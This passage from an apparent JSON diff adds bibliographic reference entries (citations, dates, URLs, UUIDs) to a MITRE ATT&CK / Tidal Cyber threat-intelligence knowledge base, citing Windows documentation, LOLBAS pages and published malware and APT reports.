"72d27aca-62c5-4e96-9977-c41951aaa888", + "value": "Russinovich Sysinternals" + }, + { + "description": "Microsoft. (2018, February 17). Windows System Services Fundamentals. Retrieved March 28, 2022.", + "meta": { + "date_accessed": "2022-03-28T00:00:00Z", + "date_published": "2018-02-17T00:00:00Z", + "refs": [ + "https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx" + ], + "source": "MITRE", + "title": "Windows System Services Fundamentals" + }, + "related": [], + "uuid": "25d54a16-59a0-497d-a4a5-021420da8f1c", + "value": "Microsoft System Services Fundamentals" + }, + { + "description": "Mathers, B. (2016, September 30). Windows Time Service Tools and Settings. Retrieved November 25, 2016.", + "meta": { + "date_accessed": "2016-11-25T00:00:00Z", + "date_published": "2016-09-30T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings" + ], + "source": "MITRE", + "title": "Windows Time Service Tools and Settings" + }, + "related": [], + "uuid": "0d908e07-abc1-40fc-b147-9b9fd483b262", + "value": "Technet Windows Time Service" + }, + { + "description": "Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.", + "meta": { + "date_accessed": "2018-03-26T00:00:00Z", + "date_published": "2017-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings" + ], + "source": "MITRE", + "title": "Windows Time Service Tools and Settings" + }, + "related": [], + "uuid": "9e3d8dec-745a-4744-b80c-d65897ebba3c", + "value": "Microsoft W32Time May 2017" + }, + { + "description": "Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.", + "meta": { + "date_accessed": "2018-03-26T00:00:00Z", + "date_published": "2018-02-01T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top" + ], + "source": "MITRE", + "title": "Windows Time Service (W32Time)" + }, + "related": [], + "uuid": "991f7a9f-4317-42fa-bc9b-f533fe36b517", + "value": "Microsoft W32Time Feb 2018" + }, + { + "description": "Microsoft. (2018, February 9). Windows Win32k Elevation of Privilege Vulnerability CVE-2021-1732. Retrieved June 1, 2022.", + "meta": { + "date_accessed": "2022-06-01T00:00:00Z", + "date_published": "2018-02-09T00:00:00Z", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732" + ], + "source": "MITRE", + "title": "Windows Win32k Elevation of Privilege Vulnerability CVE-2021-1732" + }, + "related": [], + "uuid": "7bbf39dd-851d-42dd-8be2-87de83f3abc0", + "value": "Microsoft CVE-2021-1732 Feb 2021" + }, + { + "description": "Forensics Wiki. (2021, June 19). Windows XML Event Log (EVTX). Retrieved September 13, 2021.", + "meta": { + "date_accessed": "2021-09-13T00:00:00Z", + "date_published": "2021-06-19T00:00:00Z", + "refs": [ + "https://forensicswiki.xyz/wiki/index.php?title=Windows_XML_Event_Log_(EVTX)" + ], + "source": "MITRE", + "title": "Windows XML Event Log (EVTX)" + }, + "related": [], + "uuid": "baeaad76-0acf-4921-9d6c-245649b32976", + "value": "win_xml_evt_log" + }, + { + "description": "Skalkotos, N. (2013, September 20). WinExe. Retrieved January 22, 2018.", + "meta": { + "date_accessed": "2018-01-22T00:00:00Z", + "date_published": "2013-09-20T00:00:00Z", + "refs": [ + "https://github.com/skalkoto/winexe/" + ], + "source": "MITRE", + "title": "WinExe" + }, + "related": [], + "uuid": "7003e2d4-83e5-4672-aaa9-53cc4bcb08b5", + "value": "Winexe Github Sept 2013" + }, + { + "description": "Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-us/library/ms687393" + ], + "source": "MITRE", + "title": "WinExec function" + }, + "related": [], + "uuid": "9e1ae9ae-bafc-460a-891e-e75df01c96c4", + "value": "Microsoft WinExec" + }, + { + "description": "LOLBAS. (2022, January 3). winget.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-01-03T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Winget/" + ], + "source": "Tidal Cyber", + "title": "winget.exe" + }, + "related": [], + "uuid": "5ef334f3-fe6f-4cc1-b37d-d147180a8b8d", + "value": "winget.exe - LOLBAS Project" + }, + { + "description": "Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2011-07-11T00:00:00Z", + "refs": [ + "https://github.com/prekageo/winhook" + ], + "source": "MITRE", + "title": "Winhook" + }, + "related": [], + "uuid": "9461f70f-bb14-4e40-9136-97f93aa16f33", + "value": "PreKageo Winhook Jul 2011" + }, + { + "description": "Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017.", + "meta": { + "date_accessed": "2017-02-08T00:00:00Z", + "date_published": "2015-04-07T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" + ], + "source": "MITRE", + "title": "Winnti Analysis" + }, + "related": [], + "uuid": "cbe8373b-f14b-4890-99fd-35ffd7090dea", + "value": "Novetta Winnti April 2015" + }, + { + "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.", + "meta": { + "date_accessed": "2020-04-29T00:00:00Z", + "date_published": "2019-05-15T00:00:00Z", + "refs": [ + "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a" + ], + "source": "MITRE", + "title": "Winnti: More than just Windows and Gates" + }, + "related": [], + "uuid": "e815e47a-c924-4b03-91e5-d41f2bb74773", + "value": "Chronicle Winnti for Linux May 2019" + }, + { + "description": "WinRAR. (n.d.). WinRAR download free and support: WinRAR. Retrieved December 18, 2023.", + "meta": { + "date_accessed": "2023-12-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.win-rar.com/" + ], + "source": "Tidal Cyber", + "title": "WinRAR download free and support: WinRAR" + }, + "related": [], + "uuid": "ad620d61-108c-4bb0-a897-02764ea9a903", + "value": "WinRAR Website" + }, + { + "description": "LOLBAS. (2018, May 25). winrm.vbs. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Winrm/" + ], + "source": "Tidal Cyber", + "title": "winrm.vbs" + }, + "related": [], + "uuid": "86107810-8a1d-4c13-80f0-c1624143d057", + "value": "winrm.vbs - LOLBAS Project" + }, + { + "description": "Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx" + ], + "source": "MITRE", + "title": "WinVerifyTrust function" + }, + "related": [], + "uuid": "cc14faff-c164-4135-ae36-ba68e1a50024", + "value": "Microsoft WinVerifyTrust" + }, + { + "description": "LOLBAS. (2019, July 19). Winword.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-07-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/" + ], + "source": "Tidal Cyber", + "title": "Winword.exe" + }, + "related": [], + "uuid": "6d75b154-a51d-4541-8353-22ee1d12ebed", + "value": "Winword.exe - LOLBAS Project" + }, + { + "description": "Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.", + "meta": { + "date_accessed": "2020-02-20T00:00:00Z", + "date_published": "2020-01-01T00:00:00Z", + "refs": [ + "https://www.winzip.com/win/en/" + ], + "source": "MITRE", + "title": "WinZip" + }, + "related": [], + "uuid": "dc047688-2ea3-415c-b516-06542048b049", + "value": "WinZip Homepage" + }, + { + "description": "Dell SecureWorks. (2013, March 21). Wiper Malware Analysis Attacking Korean Financial Sector. Retrieved May 13, 2015.", + "meta": { + "date_accessed": "2015-05-13T00:00:00Z", + "date_published": "2013-03-21T00:00:00Z", + "refs": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/" + ], + "source": "MITRE", + "title": "Wiper Malware Analysis Attacking Korean Financial Sector" + }, + "related": [], + "uuid": "be6629ef-e7c6-411c-9bd2-34e59062cadd", + "value": "Dell Wiper" + }, + { + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "meta": { + "date_accessed": "2017-07-10T00:00:00Z", + "refs": [ + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + ], + "source": "MITRE", + "title": "WireLurker: A New Era in iOS and OS X Malware" + }, + "related": [], + "uuid": "fd33f71b-767d-4312-a8c9-5446939bb5ae", + "value": "WireLurker" + }, + { + "description": "S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.", + "meta": { + "date_accessed": "2019-05-24T00:00:00Z", + "date_published": "2019-04-02T00:00:00Z", + "refs": [ + "https://lab52.io/blog/wirte-group-attacking-the-middle-east/" + ], + "source": "MITRE", + "title": "WIRTE Group attacking the Middle East" + }, + "related": [], + "uuid": "884b675e-390c-4f6d-8cb7-5d97d84115e5", + "value": "Lab52 WIRTE Apr 2019" + }, + { + "description": "Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.", + "meta": { + "date_accessed": "2022-02-01T00:00:00Z", + "date_published": "2021-11-29T00:00:00Z", + "refs": [ + "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044" + ], + "source": "MITRE", + "title": "WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019" + }, + "related": [], + "uuid": "143b4694-024d-49a5-be3c-d9ceca7295b2", + "value": "Kaspersky WIRTE November 2021" + }, + { + "description": "Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.", + "meta": { + "date_accessed": "2019-05-01T00:00:00Z", + "date_published": "2019-02-11T00:00:00Z", + "refs": [ + "https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/" + ], + "source": "MITRE", + "title": "With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat" + }, + "related": [], + "uuid": "3abfc3eb-7f9d-49e5-8048-4118cde3122e", + "value": "Cofense RevengeRAT Feb 2019" + }, + { + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.", + "meta": { + "date_accessed": "2021-06-15T00:00:00Z", + "date_published": "2020-10-16T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/" + ], + "source": "MITRE, Tidal Cyber", + "title": "WIZARD SPIDER Update: Resilient, Reactive and Resolute" + }, + "related": [], + "uuid": "5c8d67ea-63bc-4765-b6f6-49fa5210abe6", + "value": "CrowdStrike Wizard Spider October 2020" + }, + { + "description": "LOLBAS. (2022, February 16). Wlrmdr.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-02-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/" + ], + "source": "Tidal Cyber", + "title": "Wlrmdr.exe" + }, + "related": [], + "uuid": "43bebdc3-3072-4a3d-a0b7-0b23f1119136", + "value": "Wlrmdr.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2018, May 31). WMI Architecture. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" + ], + "source": "MITRE", + "title": "WMI Architecture" + }, + "related": [], + "uuid": "3778449c-e8b4-4ee5-914b-746053e8ca70", + "value": "Microsoft WMI Architecture" + }, + { + "description": "LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/" + ], + "source": "MITRE", + "title": "Wmic.exe" + }, + "related": [], + "uuid": "497e73d4-9f27-4b30-ba09-f152ce866d0f", + "value": "LOLBAS Wmic" + }, + { + "description": "Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes" + ], + "source": "MITRE", + "title": "WMI System Classes" + }, + "related": [], + "uuid": "60a5c359-3523-4638-aee2-3e13e0077ba9", + "value": "Microsoft WMI System Classes" + }, + { + "description": "MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022.", + "meta": { + "date_accessed": "2022-12-06T00:00:00Z", + "date_published": "2022-08-03T00:00:00Z", + "refs": [ + "https://www.malwarebytes.com/blog/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild" + ], + "source": "MITRE", + "title": "Woody RAT: A new feature-rich malware spotted in the wild" + }, + "related": [], + "uuid": "5c2ecb15-14e9-5bd3-be5f-628fa4e98ee6", + "value": "MalwareBytes WoodyRAT Aug 2022" + }, + { + "description": "LOLBAS. (2021, August 16). WorkFolders.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-08-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/" + ], + "source": "Tidal Cyber", + "title": "WorkFolders.exe" + }, + "related": [], + "uuid": "42cfa3eb-7a8c-482e-b8d8-78ae5c30b843", + "value": "WorkFolders.exe - LOLBAS Project" + }, + { + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "date_published": "2021-04-22T00:00:00Z", + "refs": [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + "source": "MITRE", + "title": "Working with Confluence Logs" + }, + "related": [], + "uuid": "f715468d-7d72-4ca4-a828-9fc909ca4f37", + "value": "Confluence Logs" + }, + { + "description": "Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.", + "meta": { + "date_accessed": "2015-07-15T00:00:00Z", + "date_published": "2006-10-01T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/kb/197571" + ], + "source": "MITRE", + "title": "Working with the AppInit_DLLs registry value" + }, + "related": [], + "uuid": "dd3f98d9-0228-45a6-9e7b-1babf911a9ac", + "value": "AppInit Registry" + }, + { + "description": "Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2019-09-17T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x48.html" + ], + "source": "MITRE", + "title": "Writing a File Monitor with Apple's Endpoint Security Framework" + }, + "related": [], + "uuid": "280ddf42-92d1-4850-9241-96c1ef9c0609", + "value": "ESF_filemonitor" + }, + { + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", + "meta": { + "date_accessed": "2017-07-10T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf" + ], + "source": "MITRE", + "title": "Writing Bad @$$ Malware for OS X" + }, + "related": [], + "uuid": "5628ecd9-48da-4a50-94ba-4b70abe56089", + "value": "Writing Bad Malware for OSX" + }, + { + "description": "LOLBAS. (2018, May 25). Wscript.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wscript/" + ], + "source": "Tidal Cyber", + "title": "Wscript.exe" + }, + "related": [], + "uuid": "6c536675-84dd-44c3-8771-70120b413db7", + "value": "Wscript.exe - LOLBAS Project" + }, + { + "description": "Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2017-08-03T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/" + ], + "source": "MITRE", + "title": "WSH INJECTION: A CASE STUDY" + }, + "related": [], + "uuid": "8b12e87b-3836-4c79-877b-0a2761b34533", + "value": "Enigma0x3 PubPrn Bypass" + }, + { + "description": "LOLBAS. (2019, June 27). Wsl.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-06-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/" + ], + "source": "Tidal Cyber", + "title": "Wsl.exe" + }, + "related": [], + "uuid": "c147902a-e8e4-449f-8106-9e268d5367d8", + "value": "Wsl.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2019, March 18). Wsreset.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-03-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/" + ], + "source": "Tidal Cyber", + "title": "Wsreset.exe" + }, + "related": [], + "uuid": "24b73a27-f2ec-4cfa-a9df-59d4d4c1dd89", + "value": "Wsreset.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2022, July 27). wt.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-07-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/wt/" + ], + "source": "Tidal Cyber", + "title": "wt.exe" + }, + "related": [], + "uuid": "bbdd85b0-fdbb-4bd2-b962-a915c23c83c2", + "value": "wt.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2020, September 23). wuauclt.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-09-23T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/" + ], + "source": "Tidal Cyber", + "title": "wuauclt.exe" + }, + "related": [], + "uuid": "09229ea3-ffd8-4d97-9728-f8c683ef6f26", + "value": "wuauclt.exe - LOLBAS Project" + }, + { + "description": "Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. Retrieved July 12, 2017.", + "meta": { + "date_accessed": "2017-07-12T00:00:00Z", + "date_published": "2017-02-14T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + ], + "source": "MITRE", + "title": "XAgentOSX: Sofacy's Xagent macOS Tool" + }, + "related": [], + "uuid": "2dc7a8f1-ccee-46f0-a995-268694f11b02", + "value": "XAgentOSX 2017" + }, + { + "description": "Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. Retrieved July 12, 2017.", + "meta": { + "date_accessed": "2017-07-12T00:00:00Z", + "date_published": "2017-02-14T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + ], + "source": "MITRE", + "title": "XAgentOSX: Sofacy's Xagent macOS Tool" + }, + "related": [], + "uuid": "b4fd246d-9bd1-4bed-a9cb-92233c5c45c4", + "value": "XAgentOSX" + }, + { + "description": "Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.", + "meta": { + "date_accessed": "2018-11-14T00:00:00Z", + "date_published": "2018-09-17T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" + ], + "source": "MITRE", + "title": "Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows" + }, + "related": [], + "uuid": "21b890f7-82db-4840-a05e-2155b8ddce8c", + "value": "Unit42 Xbash Sept 2018" + }, + { + "description": "Rayaprolu, A.. (2011, April 12). xCmd an Alternative to PsExec. Retrieved August 10, 2016.", + "meta": { + "date_accessed": "2016-08-10T00:00:00Z", + "date_published": "2011-04-12T00:00:00Z", + "refs": [ + "https://ashwinrayaprolu.wordpress.com/2011/04/12/xcmd-an-alternative-to-psexec/" + ], + "source": "MITRE", + "title": "xCmd an Alternative to PsExec" + }, + "related": [], + "uuid": "430fc6ef-33c5-4cd8-b785-358e4aae5230", + "value": "xCmd" + }, + { + "description": "Microsoft. (2023, February 3). xcopy Microsoft. Retrieved July 11, 2023.", + "meta": { + "date_accessed": "2023-07-11T00:00:00Z", + "date_published": "2023-02-03T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/xcopy" + ], + "source": "Tidal Cyber", + "title": "xcopy Microsoft" + }, + "related": [], + "uuid": "05e01751-ebb4-4b09-be89-4e405ab7e7e4", + "value": "xcopy Microsoft" + }, + { + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "refs": [ + "https://dragos.com/resource/xenotime/" + ], + "source": "MITRE", + "title": "Xenotime" + }, + "related": [], + "uuid": "b20fe65f-df43-4a59-af3f-43afafba15ab", + "value": "Dragos Xenotime 2018" + }, + { + "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2018-07-10T00:00:00Z", + "refs": [ + "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a" + ], + "source": "MITRE", + "title": "~x file downloaded in public Arch package compromise" + }, + "related": [], + "uuid": "b2900049-444a-4fe5-af1f-b9cd2cd9491c", + "value": "gist Arch package compromise 10JUL2018" + }, + { + "description": "Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants Target Exposed Docker Servers. Retrieved April 5, 2021.", + "meta": { + "date_accessed": "2021-04-05T00:00:00Z", + "date_published": "2020-06-20T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html" + ], + "source": "MITRE", + "title": "XORDDoS, Kaiji Variants Target Exposed Docker Servers" + }, + "related": [], + "uuid": "05c8909c-749c-4153-9a05-173d5d7a80a9", + "value": "Trend Micro Exposed Docker Server" + }, + { + "description": "Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved September 9, 2019.", + "meta": { + "date_accessed": "2019-09-09T00:00:00Z", + "date_published": "2017-03-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017" + ], + "source": "MITRE", + "title": "xp_cmdshell (Transact-SQL)" + }, + "related": [], + "uuid": "1945b8b2-de29-4f7a-8957-cc96fbad3b11", + "value": "Microsoft xp_cmdshell 2017" + }, + { + "description": "Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.", + "meta": { + "date_accessed": "2018-07-03T00:00:00Z", + "date_published": "2017-03-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script" + ], + "source": "MITRE", + "title": "XSLT Stylesheet Scripting Using " + }, + "related": [], + "uuid": "7ff47640-2a98-4a55-939a-ab6c8c8d2d09", + "value": "Microsoft XSLT Script Mar 2017" + }, + { + "description": "LOLBAS. (2018, May 25). Xwizard.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/" + ], + "source": "Tidal Cyber", + "title": "Xwizard.exe" + }, + "related": [], + "uuid": "573df5d1-83e7-4437-bdad-604f093b3cfd", + "value": "Xwizard.exe - LOLBAS Project" + }, + { + "description": "Linux Kernel Archives. (n.d.). Yama Documentation - ptrace_scope. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "refs": [ + "https://www.kernel.org/doc/Documentation/security/Yama.txt" + ], + "source": "MITRE", + "title": "Yama Documentation - ptrace_scope" + }, + "related": [], + "uuid": "615d7744-327e-4f14-bce0-a16c352e7486", + "value": "Linux kernel Yama" + }, + { + "description": "Douglas Bienstock. (2022, August 18). You Can’t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.", + "meta": { + "date_accessed": "2023-02-23T00:00:00Z", + "date_published": "2022-08-18T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft" + ], + "source": "MITRE", + "title": "You Can’t Audit Me: APT29 Continues Targeting Microsoft 365" + }, + "related": [], + "uuid": "e141408e-d22b-58e4-884f-0cbff25444da", + "value": "Mandiant APT29 Microsoft 365 2022" + }, + { + "description": "Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf" + ], + "source": "MITRE", + "title": "You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet" + }, + "related": [], + "uuid": "e01a6d46-5b38-42df-bd46-3995d38bb60e", + "value": "BlackHat Mac OSX Rootkit" + }, + { + "description": "Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.", + "meta": { + "date_accessed": "2018-11-06T00:00:00Z", + "date_published": "2018-03-27T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" + ], + "source": "MITRE", + "title": "You dirty RAT! Part 1: DarkComet" + }, + "related": [], + "uuid": "6a765a99-8d9f-4076-8741-6415a5ab918b", + "value": "Malwarebytes DarkComet March 2018" + }, + { + "description": "Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", + "date_published": "2018-10-03T00:00:00Z", + "refs": [ + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf" + ], + "source": "MITRE", + "title": "You’ve Got Mail! Enterprise Email Compromise" + }, + "related": [], + "uuid": "0af1795c-9cdd-43fa-8184-73f33d9f5366", + "value": "FireEye Mail CDS 2018" + }, + { + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "meta": { + "date_accessed": "2020-11-25T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/press-release/file/1328521/download" + ], + "source": "MITRE", + "title": "Yuriy Sergeyevich Andrienko et al." + }, + "related": [], + "uuid": "77788d05-30ff-4308-82e6-d123a3c2fd80", + "value": "US District Court Indictment GRU Unit 74455 October 2020" + }, + { + "description": "Wyke, J. (2012, April). ZeroAccess. Retrieved July 18, 2016.", + "meta": { + "date_accessed": "2016-07-18T00:00:00Z", + "date_published": "2012-04-01T00:00:00Z", + "refs": [ + "https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf" + ], + "source": "MITRE", + "title": "ZeroAccess" + }, + "related": [], + "uuid": "41b51767-62f1-45c2-98cb-47c44c975a58", + "value": "Sophos ZeroAccess" + }, + { + "description": "Nader Zaveri, Jeremy Kennelly, Genevieve Stark, Matthew Mcwhirt, Dan Nutting, Kimberly Goody, Justin Moore, Joe Pisano, Zander Work, Peter Ukhanov, Juraj Sucik, Will Silverstone, Zach Schramm, Greg Blaum, Ollie Styles, Nicholas Bennett, Josh Murchie. (2023, June 2). Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft. Retrieved June 16, 2023.", + "meta": { + "date_accessed": "2023-06-16T00:00:00Z", + "date_published": "2023-06-02T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft" + ], + "source": "Tidal Cyber", + "title": "Zero-Day Vulnerability in MOVEit Transfer Exploited for Data Theft" + }, + "related": [], + "uuid": "232c7555-0483-4a57-88cb-71a990f7d683", + "value": "Mandiant MOVEit Transfer June 2 2023" + }, + { + "description": "Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.", + "meta": { + "date_accessed": "2019-04-22T00:00:00Z", 